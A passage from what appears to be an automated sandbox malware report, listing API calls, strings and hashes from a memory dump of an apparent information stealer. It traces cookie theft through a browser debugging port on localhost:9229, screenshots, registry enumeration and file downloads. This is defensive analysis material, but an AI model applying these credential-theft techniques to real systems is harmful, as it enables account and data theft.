                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F19A6
                                • lstrlen.KERNEL32(00504FA0), ref: 004F19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F19D9
                                • lstrcat.KERNEL32(00000000,00504FA0), ref: 004F19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A14
                                • lstrlen.KERNEL32(00CE6D80), ref: 004F1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A8B
                                • lstrlen.KERNEL32(00CE6C80), ref: 004F1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 5ba0649b138b563cf587140e9afc9dd287e19cbfc6398396147bdfe80de5d04f
                                • Instruction ID: 6f10c92616269894fd5ae0bc32a6b4b89c73ad8eff7c4632181f3896e68c3c37
                                • Opcode Fuzzy Hash: 5ba0649b138b563cf587140e9afc9dd287e19cbfc6398396147bdfe80de5d04f
                                • Instruction Fuzzy Hash: 889110B060170BDBDB209FB6DD98A2777E8AF14344F14952AA686C3361DF7CE841CB58
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004E47C5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4812
                                • lstrlen.KERNEL32(00504B60), ref: 004E481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E483A
                                • lstrcat.KERNEL32(00000000,00504B60), ref: 004E4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 004E48DC
                                • lstrlen.KERNEL32(?), ref: 004E48F0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: f971ac96d1aa7ca4c45cbabd271fb4a3cfe607f25a107570ad08b38878efe88e
                                • Instruction ID: 0ab0c5a95d8cec6a577e1839b0c073b7c9d29c734da72206714eb5ee217b54f6
                                • Opcode Fuzzy Hash: f971ac96d1aa7ca4c45cbabd271fb4a3cfe607f25a107570ad08b38878efe88e
                                • Instruction Fuzzy Hash: CEB1D371B1025A9BCB21EF76D999AAF77B4AF90305F04412BF941A7311DB7CEC018B98
                                APIs
                                  • Part of subcall function 004D90C0: InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D90DF
                                  • Part of subcall function 004D90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004D90FC
                                  • Part of subcall function 004D90C0: InternetCloseHandle.WININET(00000000), ref: 004D9109
                                • strlen.MSVCRT ref: 004D92E1
                                • strlen.MSVCRT ref: 004D92FA
                                  • Part of subcall function 004D8980: std::_Xinvalid_argument.LIBCPMT ref: 004D8996
                                • strlen.MSVCRT ref: 004D9399
                                • strlen.MSVCRT ref: 004D93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 004D9547
                                • lstrcat.KERNEL32(?,00501794), ref: 004D9559
                                • lstrcat.KERNEL32(?,?), ref: 004D956A
                                • lstrcat.KERNEL32(?,00504B98), ref: 004D957C
                                • lstrcat.KERNEL32(?,?), ref: 004D958D
                                • lstrcat.KERNEL32(?,.txt), ref: 004D959F
                                • lstrlen.KERNEL32(?), ref: 004D95B6
                                • lstrlen.KERNEL32(?), ref: 004D95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D9614
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 783610e0e8f42b94f1863a231d2723b3a52dd1b503b826747ac2952967c96a53
                                • Instruction ID: 56f41ebaf5ba597b8388a27f28a69486f4d0a3bebe12d5d8e13f695b551d7d31
                                • Opcode Fuzzy Hash: 783610e0e8f42b94f1863a231d2723b3a52dd1b503b826747ac2952967c96a53
                                • Instruction Fuzzy Hash: F4E12871E00218EBDF10DFA8D990ADEBBB5BF58304F1044AAE509A7341DB789E45CF95
                                APIs
                                • memset.MSVCRT ref: 004ED9A1
                                • memset.MSVCRT ref: 004ED9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004ED9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 004EDA1C
                                • lstrcat.KERNEL32(?,00CFF840), ref: 004EDA36
                                • lstrcat.KERNEL32(?,?), ref: 004EDA4A
                                • lstrcat.KERNEL32(?,00CFE028), ref: 004EDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004EDA95
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EDAFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: ad23560af97ec4dadd31ddf3c3fe0109341d761841039b493de80fef39a7da60
                                • Instruction ID: 978568add93396d8ead542269e4ed3f6e7cd21bab4aba3bdb610562a5bee961c
                                • Opcode Fuzzy Hash: ad23560af97ec4dadd31ddf3c3fe0109341d761841039b493de80fef39a7da60
                                • Instruction Fuzzy Hash: 72B1D0B1E002599FDB10EFA5DC949EE77B8EF48300F10856AE946E7351DA389E44CB98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB3D9
                                • lstrlen.KERNEL32(00504C50), ref: 004DB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB474
                                • lstrcat.KERNEL32(00000000,00504C50), ref: 004DB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB4A9
                                • lstrlen.KERNEL32(00000000), ref: 004DB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB587
                                • lstrlen.KERNEL32(00504AD4), ref: 004DB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB622
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004DB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB65E
                                • lstrlen.KERNEL32(?), ref: 004DB767
                                • lstrlen.KERNEL32(?), ref: 004DB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DB79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 1e1ff2b26617b462b9d56912281da567a8b82a050345a87cdbb19827855d8675
                                • Instruction ID: 582cc705d5ca9b4ad7e92311cb075b1f588a0cfeafcb5dfc67a8cf41523343c4
                                • Opcode Fuzzy Hash: 1e1ff2b26617b462b9d56912281da567a8b82a050345a87cdbb19827855d8675
                                • Instruction Fuzzy Hash: F4022E70A01205CFCB25DF65D968B6AB7B1EF44308F19816FE5099B362DB79DC42CB88
                                APIs
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • RegOpenKeyExA.ADVAPI32(?,00CF8A20,00000000,00020019,?), ref: 004F37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004F37F7
                                • wsprintfA.USER32 ref: 004F3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004F3840
                                • RegCloseKey.ADVAPI32(?), ref: 004F384E
                                • RegCloseKey.ADVAPI32(?), ref: 004F3858
                                • RegQueryValueExA.ADVAPI32(?,00CFF3A8,00000000,000F003F,?,?), ref: 004F38A1
                                • lstrlen.KERNEL32(?), ref: 004F38B6
                                • RegQueryValueExA.ADVAPI32(?,00CFF390,00000000,000F003F,?,00000400), ref: 004F3927
                                • RegCloseKey.ADVAPI32(?), ref: 004F3972
                                • RegCloseKey.ADVAPI32(?), ref: 004F3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: c8df6b1a45f1bea4d9b1765e02e529edfd52ed95afce6d56a68b9bd1eba1555d
                                • Instruction ID: bc592a6d402b75deda9d41f1fba0c4e74215695a428911cdbe9b600cf8b8616d
                                • Opcode Fuzzy Hash: c8df6b1a45f1bea4d9b1765e02e529edfd52ed95afce6d56a68b9bd1eba1555d
                                • Instruction Fuzzy Hash: 6A91AFB2900209DFCB10DFA5CD809AEB7B9FB48314F14816AE609A7351DB79AE41CF94
                                APIs
                                • InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004D90FC
                                • InternetCloseHandle.WININET(00000000), ref: 004D9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 004D9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004D9197
                                • InternetCloseHandle.WININET(00000000), ref: 004D91A2
                                • InternetCloseHandle.WININET(00000000), ref: 004D91A9
                                • strlen.MSVCRT ref: 004D91BA
                                • strlen.MSVCRT ref: 004D91ED
                                • strlen.MSVCRT ref: 004D922E
                                • strlen.MSVCRT ref: 004D924C
                                  • Part of subcall function 004D8980: std::_Xinvalid_argument.LIBCPMT ref: 004D8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 7fe6b1185dbec1dc12b2036b5a124229cec86f7235e9730fdde2268d315e62f0
                                • Instruction ID: fe2e337e6205a436a30cb832379daeaa99fc5fa8fcd3743a24c3953b9d50dc43
                                • Opcode Fuzzy Hash: 7fe6b1185dbec1dc12b2036b5a124229cec86f7235e9730fdde2268d315e62f0
                                • Instruction Fuzzy Hash: 8951B571600209ABDB10DFA9DC45BEEF7B9EF44710F14416BF605E3380DBB8AA448B69
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004F16A1
                                • lstrcpy.KERNEL32(00000000,00CEA6D8), ref: 004F16CC
                                • lstrlen.KERNEL32(?), ref: 004F16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 004F1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F172A
                                • lstrlen.KERNEL32(00CFEB88), ref: 004F173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1762
                                • lstrcat.KERNEL32(00000000,00CFEB88), ref: 004F176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1792
                                • ShellExecuteEx.SHELL32(?), ref: 004F17CD
                                • ExitProcess.KERNEL32 ref: 004F1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: 019a1c34fcb340552879af408795401c9222e170832ab84a674c94bdeb1e9642
                                • Instruction ID: b8883e071652c99754d99e0452391950476b514c4ffc2be6875152ed8e5b9f1c
                                • Opcode Fuzzy Hash: 019a1c34fcb340552879af408795401c9222e170832ab84a674c94bdeb1e9642
                                • Instruction Fuzzy Hash: 78517771A0121EDBDB11EFA5CD9469FB7F9AF54300F04816AE605E3361DF78AE018B58
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004EF026
                                • lstrlen.KERNEL32(00000000), ref: 004EF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004EF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 004EF081
                                • lstrlen.KERNEL32(?), ref: 004EF094
                                • lstrlen.KERNEL32(00000000), ref: 004EF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 004EF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 004EF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 5bb75e6c2d24f8df123465317be942f599fa10fca9663de91c69b1aca5cab48b
                                • Instruction ID: 06cf960b8f215729b7a6e32064811d37c5cae8295e7b360e56c49c0e0a7b28d2
                                • Opcode Fuzzy Hash: 5bb75e6c2d24f8df123465317be942f599fa10fca9663de91c69b1aca5cab48b
                                • Instruction Fuzzy Hash: 29510E31A102559FCB21AF36CC59A6FB7A4EF50305F04916FF84A9B312DA38EC058B98
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00CF91D0,00709BD8,0000FFFF), ref: 004DA026
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DA053
                                • lstrlen.KERNEL32(00709BD8), ref: 004DA060
                                • lstrcpy.KERNEL32(00000000,00709BD8), ref: 004DA08A
                                • lstrlen.KERNEL32(00504C4C), ref: 004DA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DA0B2
                                • lstrcat.KERNEL32(00000000,00504C4C), ref: 004DA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DA114
                                • SetEnvironmentVariableA.KERNEL32(00CF91D0,00000000), ref: 004DA12F
                                • LoadLibraryA.KERNEL32(00CE6358), ref: 004DA143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 79693965c8e1d9beb00d082c529f92e69ec2b9947e9c2580b9a8cf849f8b8b11
                                • Instruction ID: 0140c63ea419772cbaf507918ea9a14b0e2998d2f1d903f8263e84937364dd75
                                • Opcode Fuzzy Hash: 79693965c8e1d9beb00d082c529f92e69ec2b9947e9c2580b9a8cf849f8b8b11
                                • Instruction Fuzzy Hash: 2B91C270600A10DFD7319FA5DC68A6737A5EB54704F40826BE9458B3A2EFBDDC508B8B
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EC8A2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EC8D1
                                • lstrlen.KERNEL32(00000000), ref: 004EC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EC932
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004EC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: e1839361437b3f105f23f2ed77e67041a19f182f17934142969a8f87fe2d1fb3
                                • Instruction ID: f66afa9d1f00e3d01e0d95768205e7d4349ee2f6ac622da137ad7aaeb32b34e8
                                • Opcode Fuzzy Hash: e1839361437b3f105f23f2ed77e67041a19f182f17934142969a8f87fe2d1fb3
                                • Instruction Fuzzy Hash: 6B61C5B1E002599BDB10EFB6C984BAF7BB8BF15305F00416BE841E7351DB7C89028B98
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,004F0CF0), ref: 004F4276
                                • GetDesktopWindow.USER32 ref: 004F4280
                                • GetWindowRect.USER32(00000000,?), ref: 004F428D
                                • SelectObject.GDI32(00000000,00000000), ref: 004F42BF
                                • GetHGlobalFromStream.COMBASE(004F0CF0,?), ref: 004F4336
                                • GlobalLock.KERNEL32(?), ref: 004F4340
                                • GlobalSize.KERNEL32(?), ref: 004F434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 57ef4cece10a1f88f82eb48ee71cad3b6671e2e547b1cf47d677c1b4c9812b7e
                                • Instruction ID: 2f83d7b9e47b8d14ea7f1315e8ddd63a837a8798665201ff5231fbeeb38711b3
                                • Opcode Fuzzy Hash: 57ef4cece10a1f88f82eb48ee71cad3b6671e2e547b1cf47d677c1b4c9812b7e
                                • Instruction Fuzzy Hash: 7D511E75A10209EFDB10DFA4DD85AAE77B9EF48304F10451AFA05E3351DF78AD018BA5
                                APIs
                                • lstrcat.KERNEL32(?,00CFF840), ref: 004EE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE07D
                                • lstrcat.KERNEL32(?,?), ref: 004EE098
                                • lstrcat.KERNEL32(?,?), ref: 004EE0AC
                                • lstrcat.KERNEL32(?,00CEA7C8), ref: 004EE0C0
                                • lstrcat.KERNEL32(?,?), ref: 004EE0D4
                                • lstrcat.KERNEL32(?,00CFE580), ref: 004EE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004EE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 9c44279b41598d137ccb0b935404423ce2a3eaf569c329626e2bf09f066d5530
                                • Instruction ID: 35a6d93a1331ab8a3d07a0928c4d48063616f2403d2c5d1c4efa39df936ddd1d
                                • Opcode Fuzzy Hash: 9c44279b41598d137ccb0b935404423ce2a3eaf569c329626e2bf09f066d5530
                                • Instruction Fuzzy Hash: 4161AD71A1012CEBCB61DB65CC54ADEB3B4BF58300F1089AAE649A3351DF789F858F94
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D6AFF
                                • InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D6B2C
                                • StrCmpCA.SHLWAPI(?,00CFF9E8), ref: 004D6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 004D6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004D6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004D6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004D6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004D6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 004D6C10
                                • InternetCloseHandle.WININET(00000000), ref: 004D6C17
                                • InternetCloseHandle.WININET(?), ref: 004D6C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: dcc25b9da4ed059d5ab0fd5a61e29ab3faf36d5d32fa0a77f18d39b6e0eaba1a
                                • Instruction ID: 67afd75012d5acdbc4acdaf5c49eaa8252ba57948adbad9cb504ea01804d6f8c
                                • Opcode Fuzzy Hash: dcc25b9da4ed059d5ab0fd5a61e29ab3faf36d5d32fa0a77f18d39b6e0eaba1a
                                • Instruction Fuzzy Hash: 5B417E71600219EBDB20DB64DC55FAE77B8EB44704F00855AFA05E7390EF78AE408BA8
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,004E4F39), ref: 004F4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F454C
                                • wsprintfW.USER32 ref: 004F455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004F45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004F45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 004F45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9ON$%hs$9ON
                                • API String ID: 885711575-3811011515
                                • Opcode ID: 54e206e81b8d7e3a2f023422ff1601b2e2e6df8354023b7da70033ef65b16fa7
                                • Instruction ID: 0c6c9818266aad7b704ef983611ab9a56fbbac60e33af81241163804f5b21958
                                • Opcode Fuzzy Hash: 54e206e81b8d7e3a2f023422ff1601b2e2e6df8354023b7da70033ef65b16fa7
                                • Instruction Fuzzy Hash: A9312F71A00209BBDB10DBA4DC49FEF7778AF45700F104155FB05A7190EF78AA458BAA
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DBC1F
                                • lstrlen.KERNEL32(00000000), ref: 004DBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DBCAC
                                • lstrlen.KERNEL32(00504AD4), ref: 004DBD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 4d1a684777aa472304918f34913b902a1d45055e80af027947390d281987df00
                                • Instruction ID: 93e17bbbab036a59f04c78a4e46bd8a0c28c40a220f4503f67048c797323aed8
                                • Opcode Fuzzy Hash: 4d1a684777aa472304918f34913b902a1d45055e80af027947390d281987df00
                                • Instruction Fuzzy Hash: 8CA18D70A10205CFCB21DF25D969AAEB7B1EF44308F19816FE8059B362DB39DC41CB98
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 004F6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 004F609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: a16a867f0d78feb7dce0a1f8418c61dcf407ee5a90668071066e0f0603fd5255
                                • Instruction ID: c64f9a669eaaaf36f512fd4f4dabd44d864e26a7fd135f4017a42f1f2c117b9f
                                • Opcode Fuzzy Hash: a16a867f0d78feb7dce0a1f8418c61dcf407ee5a90668071066e0f0603fd5255
                                • Instruction Fuzzy Hash: 21619070700508DFDB18CF5CC99097EB7B6EF85304B354A5AE79287781CB35AD818BA9
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE07D
                                • lstrcat.KERNEL32(?,?), ref: 004EE098
                                • lstrcat.KERNEL32(?,?), ref: 004EE0AC
                                • lstrcat.KERNEL32(?,00CEA7C8), ref: 004EE0C0
                                • lstrcat.KERNEL32(?,?), ref: 004EE0D4
                                • lstrcat.KERNEL32(?,00CFE580), ref: 004EE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004EE126
                                Memory Dump Source
